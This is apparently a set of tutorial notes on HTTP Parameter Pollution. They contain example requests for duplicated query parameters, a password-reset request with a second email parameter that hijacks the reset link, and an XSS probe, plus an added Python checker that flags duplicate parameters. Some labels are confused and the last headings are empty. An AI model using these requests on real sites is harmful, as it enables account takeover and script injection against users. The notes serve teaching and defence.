HTTP Parameter Pollution (HPP) is a web application vulnerability that allows attackers to manipulate or retrieve hidden information by injecting encoded query string delimiters into existing parameters.

Example

1st vulnerability before mitigation

glass.com/index.aspx?page=select 1,2,3

2nd vulnerability after mitigation

glass.com/index.aspx?page=select 1,2&page=3

What we did here is pollute the 1,2,3 parameter with 1,2&page=3.

The 1,2 part was processed by the server, and because the server was not asked to check the next parameter, page=3 was simply passed through. The result is the response for 1,2&page=3, where page=3 is the polluted part.

Another example: auth bypass in a password reset request

Original Req
 
POST /resetpassword.do HTTP/1.1
secruity_token_rameshtoken&[email protected]&sentlink=yes

Vulnerable Req

POST /resetpassword.do HTTP/1.1
secruity_token_rameshtoken&[email protected]&[email protected]&sentlink=yes
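
Both requests above depend on one parameter name appearing twice, so a filter and the application can each read a different value. The following is an added example, not code from the original notes: a server-side check that shows the first-wins, last-wins and comma-joined readings of a query string and flags duplicates and encoded delimiters. The function names and the sample body (including the parameter name email) are constructed for illustration.

```python
from urllib.parse import parse_qsl

def group_params(query):
    """Collect every value sent for each parameter name, in order."""
    grouped = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        grouped.setdefault(name, []).append(value)
    return grouped

def interpretations(query):
    """How three common parsing strategies read the same query string."""
    return {
        name: {"first": v[0], "last": v[-1], "joined": ",".join(v)}
        for name, v in group_params(query).items()
    }

def hpp_findings(query):
    """Return (name, reason) pairs for input that should be rejected or logged."""
    findings = []
    for name, values in group_params(query).items():
        if len(values) > 1:
            # Same name twice: a validator and the backend may disagree.
            findings.append((name, "duplicate"))
        if any("&" in v for v in values):
            # A decoded '&' (sent as %26) splits into a new parameter if the
            # value is later placed into another URL without re-encoding.
            findings.append((name, "embedded-delimiter"))
    return findings

# Constructed samples; the first two are the query strings from the notes.
SAMPLES = [
    "page=select 1,2&page=3",
    "search=cat&search=dog",
    "search=cat%26search%3Ddog",
    "email=a%40example.test&email=b%40example.test&sentlink=yes",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(q)
        print("  readings:", interpretations(q))
        print("  findings:", hpp_findings(q))
```

For page=select 1,2&page=3 the comma-joined reading is select 1,2,3, the same value as the first request, while a check that looks only at the first value sees select 1,2.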


Testing on both sides: client and server

Server-Side

1 Req
xttp://flass.com/?search=cat

2 Req
xttp://flass.com/?search=cat&search=dog

Client-Side

Reflected XSS is also a client-side HPP.

xttp://flass.com/?search=cat

xttp://flass.com/?search=<script>alert(2)</script> did not work

xttp://flass.com/?search=cat&search=<script>alert(2)</script> this worked

Any result that is reflected back to you or on the client side.

Testing Scope and Vectors and preferred areas to test the target

Automation

Testing methods